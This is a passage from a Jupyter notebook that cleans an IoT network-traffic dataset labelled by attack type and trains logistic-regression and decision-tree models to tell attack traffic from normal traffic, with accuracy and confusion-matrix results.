Name: mbtcp.trans_id, dtype: int64
------------------
mbtcp.unit_id
------------------
0.0 17335
1.0 2
Name: mbtcp.unit_id, dtype: int64
------------------
Attack_label
------------------
0 12622
1 4715
Name: Attack_label, dtype: int64
------------------
Attack_type
------------------
Normal 12622
DDoS_UDP 949
DDoS_ICMP 910
SQL_injection 400
DDoS_TCP 391
Password 391
Vulnerability_scanner 391
DDoS_HTTP 390
Uploading 294
Backdoor 194
Port_Scanning 177
XSS 125
Ransomware 86
MITM 9
Fingerprinting 8
Name: Attack_type, dtype: int64
#view dimensions of dataset (rows and columns)
print ("Rows,columns in dataset:", df.shape)
Rows,columns in dataset: (17337, 63)
df.info()
<class 'pandas.core.frame.DataFrame'> RangeIndex: 17337 entries, 127 to 2219135 Data columns (total 63 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 frame.time 17337 non-null object 1 ip.src_host 17337 non-null object 2 ip.dst_host 17337 non-null object 3 arp.dst.proto_ipv4 17337 non-null object 4 arp.opcode 17337 non-null float64 5 arp.hw.size 17337 non-null float64 6 arp.src.proto_ipv4 17337 non-null object 7 icmp.checksum 17337 non-null float64 8 icmp.seq_le 17337 non-null float64 9 icmp.transmit_timestamp 17337 non-null float64 10 icmp.unused 17337 non-null float64 11 http.file_data 17337 non-null object 12 http.content_length 17337 non-null float64 13 http.request.uri.query 17337 non-null object 14 http.request.method 17337 non-null object 15 http.referer 17337 non-null object 16 http.request.full_uri 17337 non-null object 17 http.request.version 17337 non-null object 18 http.response 17337 non-null float64 19 http.tls_port 17337 non-null float64 20 tcp.ack 17337 non-null float64 21 tcp.ack_raw 17337 non-null float64 22 tcp.checksum 17337 non-null float64 23 tcp.connection.fin 17337 non-null float64 24 tcp.connection.rst 17337 non-null float64 25 tcp.connection.syn 17337 non-null float64 26 tcp.connection.synack 17337 non-null float64 27 tcp.dstport 17337 non-null float64 28 tcp.flags 17337 non-null float64 29 tcp.flags.ack 17337 non-null float64 30 tcp.len 17337 non-null float64 31 tcp.options 17337 non-null object 32 tcp.payload 17337 non-null object 33 tcp.seq 17337 non-null float64 34 tcp.srcport 17337 non-null object 35 udp.port 17337 non-null float64 36 udp.stream 17337 non-null float64 37 udp.time_delta 17337 non-null float64 38 dns.qry.name 17337 non-null float64 39 dns.qry.name.len 17337 non-null object 40 dns.qry.qu 17337 non-null float64 41 dns.qry.type 17337 non-null float64 42 dns.retransmission 17337 non-null float64 43 dns.retransmit_request 17337 non-null float64 44 dns.retransmit_request_in 17337 non-null float64 45 mqtt.conack.flags 17337 non-null object 46 mqtt.conflag.cleansess 17337 non-null float64 47 mqtt.conflags 17337 non-null float64 48 mqtt.hdrflags 17337 non-null float64 49 mqtt.len 17337 non-null float64 50 mqtt.msg_decoded_as 17337 non-null float64 51 mqtt.msg 17337 non-null object 52 mqtt.msgtype 17337 non-null float64 53 mqtt.proto_len 17337 non-null float64 54 mqtt.protoname 17337 non-null object 55 mqtt.topic 17337 non-null object 56 mqtt.topic_len 17337 non-null float64 57 mqtt.ver 17337 non-null float64 58 mbtcp.len 17337 non-null float64 59 mbtcp.trans_id 17337 non-null float64 60 mbtcp.unit_id 17337 non-null float64 61 Attack_label 17337 non-null int64 62 Attack_type 17337 non-null object dtypes: float64(42), int64(1), object(20) memory usage: 8.3+ MB
# look at the column names
df.columns
Index(['frame.time', 'ip.src_host', 'ip.dst_host', 'arp.dst.proto_ipv4',
'arp.opcode', 'arp.hw.size', 'arp.src.proto_ipv4', 'icmp.checksum',
'icmp.seq_le', 'icmp.transmit_timestamp', 'icmp.unused',
'http.file_data', 'http.content_length', 'http.request.uri.query',
'http.request.method', 'http.referer', 'http.request.full_uri',
'http.request.version', 'http.response', 'http.tls_port', 'tcp.ack',
'tcp.ack_raw', 'tcp.checksum', 'tcp.connection.fin',
'tcp.connection.rst', 'tcp.connection.syn', 'tcp.connection.synack',
'tcp.dstport', 'tcp.flags', 'tcp.flags.ack', 'tcp.len', 'tcp.options',
'tcp.payload', 'tcp.seq', 'tcp.srcport', 'udp.port', 'udp.stream',
'udp.time_delta', 'dns.qry.name', 'dns.qry.name.len', 'dns.qry.qu',
'dns.qry.type', 'dns.retransmission', 'dns.retransmit_request',
'dns.retransmit_request_in', 'mqtt.conack.flags',
'mqtt.conflag.cleansess', 'mqtt.conflags', 'mqtt.hdrflags', 'mqtt.len',
'mqtt.msg_decoded_as', 'mqtt.msg', 'mqtt.msgtype', 'mqtt.proto_len',
'mqtt.protoname', 'mqtt.topic', 'mqtt.topic_len', 'mqtt.ver',
'mbtcp.len', 'mbtcp.trans_id', 'mbtcp.unit_id', 'Attack_label',
'Attack_type'],
dtype='object')
print(df['frame.time'].value_counts().head())
print("\nNull Values:")
print(df['frame.time'].isna().sum())
192.168.0.128 96 0.0 5 6.0 4 2021 20:41:43.020677000 1 2021 20:41:51.125102000 1 Name: frame.time, dtype: int64 Null Values: 0
# converting to datetime
def convert_to_datetime(value):
try:
return pd.to_datetime(value)
except:
return np.nan
df['frame.time'] = df['frame.time'].apply(convert_to_datetime)
# Validating IP address
print(df['ip.src_host'].value_counts().head())
print('_________________________________________________________')
print(df['ip.dst_host'].value_counts().head())
print('_________________________________________________________')
print(df['arp.src.proto_ipv4'].value_counts().head())
print('_________________________________________________________')
print(df['arp.dst.proto_ipv4'].value_counts().head())
192.168.0.128 7541 192.168.0.101 5206 0 2248 192.168.0.170 1253 0.0.0.0 15 Name: ip.src_host, dtype: int64 _________________________________________________________ 192.168.0.128 7437 192.168.0.101 5175 0 2968 192.168.0.170 1161 0 128 Name: ip.dst_host, dtype: int64 _________________________________________________________ 0 12440 0 4793 0.0 62 192.168.0.1 22 192.168.0.128 10 Name: arp.src.proto_ipv4, dtype: int64 _________________________________________________________ 0 13165 0 4025 192.168.0.128 107 192.168.0.147 10 192.168.0.1 9 Name: arp.dst.proto_ipv4, dtype: int64
# just for fun explore these values in the http.file_data column
#df[df['Attack_label'] == 1]['http.file_data'].value_counts()
df['mqtt.topic'].value_counts()
0 11952 0.0 4665 Temperature_and_Humidity 670 0.0 50 Name: mqtt.topic, dtype: int64
df['mqtt.protoname'].value_counts()
0 11963 0.0 4665 MQTT 659 0.0 50 Name: mqtt.protoname, dtype: int64
df['dns.qry.name.len'].value_counts()
0 15417 0 1857 0.0 49 0.debian.pool.ntp.org 4 1.debian.pool.ntp.org 3 2.debian.pool.ntp.org 3 3.debian.pool.ntp.org 2 _googlecast._tcp.local 1 1.0 1 Name: dns.qry.name.len, dtype: int64
df['http.request.method'].value_counts()
0.0 15033 0 1510 0.0 546 GET 236 POST 11 TRACE 1 Name: http.request.method, dtype: int64
# how many 0 (normal) and 1 (attack) values do we have?
df['Attack_label'].value_counts()
0 12622 1 4715 Name: Attack_label, dtype: int64
plt.figure(figsize=(15, 6))
sns.countplot(data=df, x='Attack_label', hue='Attack_type', edgecolor='black', linewidth=1)
plt.title('Attack Label vs Attack Type', fontsize=20)
plt.show()
import plotly.express as px
fig = px.pie(df, names='Attack_label', title='Distribution of Attack Labels')
fig.show()
fig = px.pie(df, names='Attack_type', title='Distribution of Attack Type')
fig.show()
Now using our domain knowledge we will only select useful features from our dataset and drop the rest
#view dimensions of dataset (rows and columns)
print ("Rows,columns in dataset:", df.shape)
Rows,columns in dataset: (17337, 63)
# Identifying columns that are entirely NaN (empty) or have all zero values
empty_or_zero_columns = df.columns[(df.isnull().all())
| (df == 0).all() | (df == 1).all() | (df == 1.0).all()
| (df == 0.0).all() | (df == 2).all() | (df == 2.0).all()]
# Displaying the identified columns
empty_features = empty_or_zero_columns.tolist()
print("These columns are all empty features:")
print(empty_features)
for feature in empty_features:
if feature in df.columns:
df.drop(feature, axis=1, inplace=True)
print("Dropping empty feature:", feature)
These columns are all empty features: ['icmp.unused', 'http.tls_port', 'dns.qry.type', 'mqtt.msg_decoded_as'] Dropping empty feature: icmp.unused Dropping empty feature: http.tls_port Dropping empty feature: dns.qry.type Dropping empty feature: mqtt.msg_decoded_as
# show the columns to confirm the features have been dropped
df.head()
| frame.time | ip.src_host | ip.dst_host | arp.dst.proto_ipv4 | arp.opcode | arp.hw.size | arp.src.proto_ipv4 | icmp.checksum | icmp.seq_le | icmp.transmit_timestamp | ... | mqtt.proto_len | mqtt.protoname | mqtt.topic | mqtt.topic_len | mqtt.ver | mbtcp.len | mbtcp.trans_id | mbtcp.unit_id | Attack_label | Attack_type | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 127 | 2021-01-01 11:44:16.240051 | 192.168.0.101 | 192.168.0.128 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
| 255 | 2021-01-01 11:44:24.267046 | 192.168.0.101 | 192.168.0.128 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
| 383 | 2021-01-01 11:44:32.310917 | 192.168.0.128 | 192.168.0.101 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
| 511 | 2021-01-01 11:44:42.310422 | 192.168.0.128 | 192.168.0.101 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
| 639 | 2021-01-01 11:44:48.414713 | 192.168.0.101 | 192.168.0.128 | 0 | 0.0 | 0.0 | 0 | 0.0 | 0.0 | 0.0 | ... | 0.0 | 0 | 0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0 | Normal |
5 rows × 59 columns
#view dimensions of dataset (rows and columns)
print ("Rows,columns in dataset:", df.shape)
Rows,columns in dataset: (17337, 59)
# drop these features
feature_names = ["frame.time", "ip.src_host", "ip.dst_host", "arp.src.proto_ipv4","arp.dst.proto_ipv4",
"http.file_data","http.request.full_uri","icmp.transmit_timestamp",
"http.request.uri.query", "tcp.options","tcp.payload","tcp.srcport",
"tcp.dstport", "udp.port", "mqtt.msg", "icmp.unused", "http.tls_port", 'dns.qry.type',
'dns.retransmit_request_in', "mqtt.msg_decoded_as", "mbtcp.trans_id", "mbtcp.unit_id", "http.request.method", "http.referer",
"http.request.version", "dns.qry.name.len", "mqtt.conack.flags", "mqtt.protoname", "mqtt.topic"]
# potential_drop_list = ['arp.opcode']
for feature_name in feature_names:
if feature_name in df.columns:
df.drop(feature_name, axis=1, inplace=True)
print("Dropping feature:", feature_name)
Dropping feature: frame.time Dropping feature: ip.src_host Dropping feature: ip.dst_host Dropping feature: arp.src.proto_ipv4 Dropping feature: arp.dst.proto_ipv4 Dropping feature: http.file_data Dropping feature: http.request.full_uri Dropping feature: icmp.transmit_timestamp Dropping feature: http.request.uri.query Dropping feature: tcp.options Dropping feature: tcp.payload Dropping feature: tcp.srcport Dropping feature: tcp.dstport Dropping feature: udp.port Dropping feature: mqtt.msg Dropping feature: dns.retransmit_request_in Dropping feature: mbtcp.trans_id Dropping feature: mbtcp.unit_id Dropping feature: http.request.method Dropping feature: http.referer Dropping feature: http.request.version Dropping feature: dns.qry.name.len Dropping feature: mqtt.conack.flags Dropping feature: mqtt.protoname Dropping feature: mqtt.topic
#view dimensions of dataset (rows and columns)
print ("Rows,columns in dataset after dropping features:", df.shape)
Rows,columns in dataset after dropping features: (17337, 34)
# print(df[df['tcp.flags.ack'] == 1]['Attack_label'].value_counts(normalize=True))
# print(df[df['tcp.flags.ack'] == 0]['Attack_label'].value_counts(normalize=True))
df['Attack_label'].groupby(df['tcp.flags.ack']).value_counts(normalize=True)
# hence we group by is prefered
tcp.flags.ack Attack_label
0.0 1 0.558176
0 0.441824
1.0 0 0.826931
1 0.173069
Name: Attack_label, dtype: float64
df.info()
<class 'pandas.core.frame.DataFrame'> RangeIndex: 17337 entries, 127 to 2219135 Data columns (total 34 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 arp.opcode 17337 non-null float64 1 arp.hw.size 17337 non-null float64 2 icmp.checksum 17337 non-null float64 3 icmp.seq_le 17337 non-null float64 4 http.content_length 17337 non-null float64 5 http.response 17337 non-null float64 6 tcp.ack 17337 non-null float64 7 tcp.ack_raw 17337 non-null float64 8 tcp.checksum 17337 non-null float64 9 tcp.connection.fin 17337 non-null float64 10 tcp.connection.rst 17337 non-null float64 11 tcp.connection.syn 17337 non-null float64 12 tcp.connection.synack 17337 non-null float64 13 tcp.flags 17337 non-null float64 14 tcp.flags.ack 17337 non-null float64 15 tcp.len 17337 non-null float64 16 tcp.seq 17337 non-null float64 17 udp.stream 17337 non-null float64 18 udp.time_delta 17337 non-null float64 19 dns.qry.name 17337 non-null float64 20 dns.qry.qu 17337 non-null float64 21 dns.retransmission 17337 non-null float64 22 dns.retransmit_request 17337 non-null float64 23 mqtt.conflag.cleansess 17337 non-null float64 24 mqtt.conflags 17337 non-null float64 25 mqtt.hdrflags 17337 non-null float64 26 mqtt.len 17337 non-null float64 27 mqtt.msgtype 17337 non-null float64 28 mqtt.proto_len 17337 non-null float64 29 mqtt.topic_len 17337 non-null float64 30 mqtt.ver 17337 non-null float64 31 mbtcp.len 17337 non-null float64 32 Attack_label 17337 non-null int64 33 Attack_type 17337 non-null object dtypes: float64(32), int64(1), object(1) memory usage: 4.5+ MB
#view dimensions of dataset (rows and columns)
print ("Rows,columns in dataset:", df.shape)
Rows,columns in dataset: (17337, 34)

from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
df['Attack_label'] = le.fit_transform(df['Attack_label'])
df['Attack_label'].value_counts()
0 12622 1 4715 Name: Attack_label, dtype: int64
# The final column in the dataset is Attack_type, and will contain one of these values:
# Display unique values in the "Attack_type" column
unique_attack_types = df['Attack_type'].unique()
print("Unique Attack Types:")
print(unique_attack_types)
Unique Attack Types: ['Normal' 'MITM' 'Uploading' 'Ransomware' 'SQL_injection' 'DDoS_HTTP' 'DDoS_TCP' 'Password' 'Port_Scanning' 'Vulnerability_scanner' 'Backdoor' 'XSS' 'Fingerprinting' 'DDoS_UDP' 'DDoS_ICMP']
# separate X and y variables (independent and dependent variables)
X = df.drop(['Attack_label', 'Attack_type'], axis=1)
y_label = df['Attack_label']
y_type = df['Attack_type']
X
| arp.opcode | arp.hw.size | icmp.checksum | icmp.seq_le | http.content_length | http.response | tcp.ack | tcp.ack_raw | tcp.checksum | tcp.connection.fin | ... | dns.retransmit_request | mqtt.conflag.cleansess | mqtt.conflags | mqtt.hdrflags | mqtt.len | mqtt.msgtype | mqtt.proto_len | mqtt.topic_len | mqtt.ver | mbtcp.len | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 127 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 6.0 | 1.150836e+09 | 33874.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
| 255 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 6.0 | 1.911588e+09 | 53226.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
| 383 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.000000e+00 | 24782.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
| 511 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 1.0 | 3.183727e+09 | 43301.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
| 639 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 6.0 | 3.511028e+09 | 19720.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
| ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... |
| 2218623 | 0.0 | 0.0 | 59354.0 | 7625.0 | 0.0 | 0.0 | 0.0 | 0.000000e+00 | 0.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
| 2218751 | 0.0 | 0.0 | 32937.0 | 20272.0 | 0.0 | 0.0 | 0.0 | 0.000000e+00 | 0.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
| 2218879 | 0.0 | 0.0 | 39049.0 | 28440.0 | 0.0 | 0.0 | 0.0 | 0.000000e+00 | 0.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
| 2219007 | 0.0 | 0.0 | 20837.0 | 37727.0 | 0.0 | 0.0 | 0.0 | 0.000000e+00 | 0.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
| 2219135 | 0.0 | 0.0 | 11607.0 | 41347.0 | 0.0 | 0.0 | 0.0 | 0.000000e+00 | 0.0 | 0.0 | ... | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 | 0.0 |
17337 rows × 32 columns
y_label
127 0
255 0
383 0
511 0
639 0
..
2218623 1
2218751 1
2218879 1
2219007 1
2219135 1
Name: Attack_label, Length: 17337, dtype: int64
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Current Time: 2024-01-02 18:51:23 The entire notebook runtime so far is 3 minutes
y_type
127 Normal
255 Normal
383 Normal
511 Normal
639 Normal
...
2218623 DDoS_ICMP
2218751 DDoS_ICMP
2218879 DDoS_ICMP
2219007 DDoS_ICMP
2219135 DDoS_ICMP
Name: Attack_type, Length: 17337, dtype: object
X_train, X_test, y_train_label, y_test_label = train_test_split(X, y_label, test_size=0.2, random_state=42)
# Initialize RandomUnderSampler
rus = RandomUnderSampler(sampling_strategy=1, random_state=42)
# Apply Random Under Sampling
X_train_resampled, y_train_label_resampled = rus.fit_resample(X_train, y_train_label)
# If you wanted to balance the classes with SMOTE instead, sample code shown below:
## Create an instance of the SMOTE class
#smote = SMOTE(sampling_strategy='auto')
## Apply SMOTE to the training data
#X_train_resampled, y_train_type_resampled = smote.fit_resample(X_train, y_train_type)
print("Class balance before resampling")
print(y_train_label.value_counts())
print('\n')
print("Class balance after resampling")
print(y_train_label_resampled.value_counts())
Class balance before resampling 0 10083 1 3786 Name: Attack_label, dtype: int64 Class balance after resampling 0 3786 1 3786 Name: Attack_label, dtype: int64
# BUG ALERT - classes are not balanced!
# I think this is because we are using label encoding of the Attack_type feature, not the Attack_label feature
# confirm the classes are balanced
# the final column in the dataframe is named "Attack_label", and will be 0 f the data is normal,
# or 1 if the data indicates an attack.
# Figure out how many rows of each class exist in the dataframe
normal_class = (df[(df['Attack_label'] == 0)])
print("Number of rows in normal class:", (len(normal_class)) )
abnormal_class = (df[(df['Attack_label'] == 1)])
print(f"Number of rows in abnormal class:", (len(abnormal_class)) )
total_rows = len(abnormal_class) + len(normal_class)
print(f"Total Number of rows (normal+abnormal): {total_rows}" )
balance = len(abnormal_class) / total_rows * 100
balance = round(balance,2)
print(f"Percentage of abnormal class in dataset (abnormal/total*100): {balance}%")
if (balance < 10): print("This dataset is very imbalanced, please beware of overfitting.")
if (balance == 50): print("This dataset is perfectly balanced.")
Number of rows in normal class: 12622 Number of rows in abnormal class: 4715 Total Number of rows (normal+abnormal): 17337 Percentage of abnormal class in dataset (abnormal/total*100): 27.2%
is_data_scaled = "yes" #yes|no flag to turn feature scaling on|off to see if it changes prediction accuracy
if (is_data_scaled == "yes"):
scaler = StandardScaler()
X_train_scaled = scaler.fit_transform(X_train_resampled)
X_test_scaled = scaler.transform(X_test) # Only transform the test set, don't fit
# Save the values under original names so we can use consistent names in subsequent sections
X_train_resampled = X_train_scaled
X_test = X_test_scaled
else:
print(f"WARNING: dataset is not being scaled, so the results may be skewed due to data distribution!")
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Current Time: 2024-01-02 18:51:23 The entire notebook runtime so far is 3 minutes
# Create an instance of the LogisticRegression model
clf = LogisticRegression()
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_lr_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
# We want to see approximately equal results from TN and TP
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'C': 1.0, 'class_weight': None, 'dual': False, 'fit_intercept': True, 'intercept_scaling': 1, 'l1_ratio': None, 'max_iter': 100, 'multi_class': 'auto', 'n_jobs': None, 'penalty': 'l2', 'random_state': None, 'solver': 'lbfgs', 'tol': 0.0001, 'verbose': 0, 'warm_start': False}
Accuracy: 0.871683967704729
C:\Users\njeffrey\anaconda3\lib\site-packages\sklearn\linear_model\_logistic.py:460: ConvergenceWarning:
lbfgs failed to converge (status=1):
STOP: TOTAL NO. of ITERATIONS REACHED LIMIT.
Increase the number of iterations (max_iter) or scale the data as shown in:
https://scikit-learn.org/stable/modules/preprocessing.html
Please also refer to the documentation for alternative solver options:
https://scikit-learn.org/stable/modules/linear_model.html#logistic-regression
Confusion matrix
[[2343 196]
[ 249 680]]
True Negatives (TN) = 2343
False Positives (FP) = 196
False Negatives (FN) = 249
True Positives (TP) = 680
Accuracy: 0.871683967704729
Sensitivity: 0.7319698600645855
Specificity: 0.9228042536431666
Geometric Mean: 0.8218667169354122
Precision: 0.8697326954142447
Recall: 0.871683967704729
f1-score: 0.8704628154375667
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9039 0.9228 0.9133 2539
1 0.7763 0.7320 0.7535 929
accuracy 0.8717 3468
macro avg 0.8401 0.8274 0.8334 3468
weighted avg 0.8697 0.8717 0.8705 3468
Current Time: 2024-01-02 18:51:23
The entire notebook runtime so far is 3 minutes
# Create an instance of the model
clf = LogisticRegression()
# Define the hyperparameters to tune
param_grid = {
'penalty': ['l1', 'l2'],
'C': [0.001, 0.01, 0.1, 1, 10, 100],
'solver': ['liblinear', 'saga'],
'max_iter': [100, 200, 300],
'random_state': [42] #for reproducible results
}
# Create an instance of GridSearchCV
grid_search = GridSearchCV(clf, param_grid, cv=cv_count, n_jobs=-1)
# Fit the grid search to the training data
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Get the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Create a new instance of the model with the best hyperparameters
clf = LogisticRegression(**best_params)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the model
accuracy = accuracy_score(y_test_label, y_pred)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_lr_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_lr = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Best Parameters: {'C': 100, 'max_iter': 100, 'penalty': 'l2', 'random_state': 42, 'solver': 'liblinear'}
Best Scores: 0.8436330397381694
Cross validation scores: [0.85620053 0.84168865 0.84015852 0.84280053 0.84940555 0.82694848
0.86261559 0.82959049 0.84412153 0.84280053]
Mean cross validation score: 0.8436330397381694
Standard Deviation cross validation score: 0.010220793401870746
Accuracy: 0.8739907727797002
Confusion matrix
[[2356 183]
[ 254 675]]
True Negatives (TN) = 2356
False Positives (FP) = 183
False Negatives (FN) = 254
True Positives (TP) = 675
Accuracy: 0.8739907727797002
Sensitivity: 0.7265877287405813
Specificity: 0.9279243796770382
Geometric Mean: 0.8211080729554131
Precision: 0.871616557641495
Recall: 0.8739907727797002
f1-score: 0.8723562876793427
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9027 0.9279 0.9151 2539
1 0.7867 0.7266 0.7555 929
accuracy 0.8740 3468
macro avg 0.8447 0.8273 0.8353 3468
weighted avg 0.8716 0.8740 0.8724 3468
Current Time: 2024-01-02 18:52:51
The entire notebook runtime so far is 5 minutes
# Create an instance of the DecisionTreeClassifier model
clf = DecisionTreeClassifier()
default_params = clf.get_params()
print(f"Training model with default hyperparameters of: {default_params}")
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# Evaluate the model
accuracy = clf.score(X_test, y_test_label)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_dt_undersampled_unoptimized = accuracy
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Training model with default hyperparameters of: {'ccp_alpha': 0.0, 'class_weight': None, 'criterion': 'gini', 'max_depth': None, 'max_features': None, 'max_leaf_nodes': None, 'min_impurity_decrease': 0.0, 'min_samples_leaf': 1, 'min_samples_split': 2, 'min_weight_fraction_leaf': 0.0, 'random_state': None, 'splitter': 'best'}
Accuracy: 0.9305074971164936
Confusion matrix
[[2344 195]
[ 46 883]]
True Negatives (TN) = 2344
False Positives (FP) = 195
False Negatives (FN) = 46
True Positives (TP) = 883
Accuracy: 0.9305074971164936
Sensitivity: 0.9504843918191603
Specificity: 0.9231981094919259
Geometric Mean: 0.9367419034232598
Precision: 0.9374523955421562
Recall: 0.9305074971164936
f1-score: 0.932036711053574
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9808 0.9232 0.9511 2539
1 0.8191 0.9505 0.8799 929
accuracy 0.9305 3468
macro avg 0.8999 0.9368 0.9155 3468
weighted avg 0.9375 0.9305 0.9320 3468
Current Time: 2024-01-02 18:52:51
The entire notebook runtime so far is 5 minutes
# Create an instance of the DecisionTreeClassifier model
clf = DecisionTreeClassifier()
# Define the hyperparameters to tune
param_grid = {
'criterion': ['gini', 'entropy'],
'max_depth': [None, 5, 10, 15],
'min_samples_split': [2, 5, 10],
'min_samples_leaf': [1, 2, 4],
'random_state': [42] #for reproducible results
}
# Create an instance of GridSearchCV
grid_search = GridSearchCV(clf, param_grid, cv=cv_count,n_jobs=-1)
# Fit the grid search to the training data
grid_search.fit(X_train_resampled, y_train_label_resampled)
# Get the best hyperparameters
best_params = grid_search.best_params_
best_scores = grid_search.best_score_
print("Best Parameters:", best_params)
print("Best Scores:", best_scores)
# Create a new instance of the model with the best hyperparameters
clf = DecisionTreeClassifier(**best_params)
# Fit the model to the training data
clf.fit(X_train_resampled, y_train_label_resampled)
# Predict the labels for the test data
y_pred = clf.predict(X_test)
# final cross validation
cross_val_score_result = cross_val_score(clf, X_train_resampled, y_train_label_resampled, cv=cv_count)
print(f"Cross validation scores: {cross_val_score_result}")
print(f"Mean cross validation score: {cross_val_score_result.mean()}")
print(f"Standard Deviation cross validation score: {cross_val_score_result.std()}")
# Evaluate the model
accuracy = accuracy_score(y_test_label, y_pred)
print("Accuracy:", accuracy)
# save accuracy for later comparison
accuracy_dt_undersampled_optimized = accuracy
# save best parameters for later comparison
best_params_dt = best_params
# call previously defined function to create confusion matrix
cm = visualize_confusion_matrix(y_test_label, y_pred)
# call previously defined function to create report on model precision, recall, f1-score, accuracy
model_classification_report(cm, y_test_label, y_pred)
# show a running total of elapsed time for the entire notebook
show_elapsed_time()
Best Parameters: {'criterion': 'entropy', 'max_depth': 10, 'min_samples_leaf': 1, 'min_samples_split': 5, 'random_state': 42}
Best Scores: 0.9455875330686677
Cross validation scores: [0.95118734 0.95118734 0.93791281 0.95772787 0.94848085 0.94583884
0.9339498 0.94980185 0.94319683 0.93659181]
Mean cross validation score: 0.9455875330686677
Standard Deviation cross validation score: 0.007192182572347264
Accuracy: 0.9561707035755479
Confusion matrix
[[2427 112]
[ 40 889]]
True Negatives (TN) = 2427
False Positives (FP) = 112
False Negatives (FN) = 40
True Positives (TP) = 889
Accuracy: 0.9561707035755479
Sensitivity: 0.9569429494079655
Specificity: 0.9558881449389524
Geometric Mean: 0.9564154017590839
Precision: 0.9581570167954033
Recall: 0.9561707035755479
f1-score: 0.9566730521529915
------------------------------------------------
Classification Report:
precision recall f1-score support
0 0.9838 0.9559 0.9696 2539
1 0.8881 0.9569 0.9212 929
accuracy 0.9562 3468
macro avg 0.9359 0.9564 0.9454 3468
weighted avg 0.9582 0.9562 0.9567 3468
Current Time: 2024-01-02 18:52:56
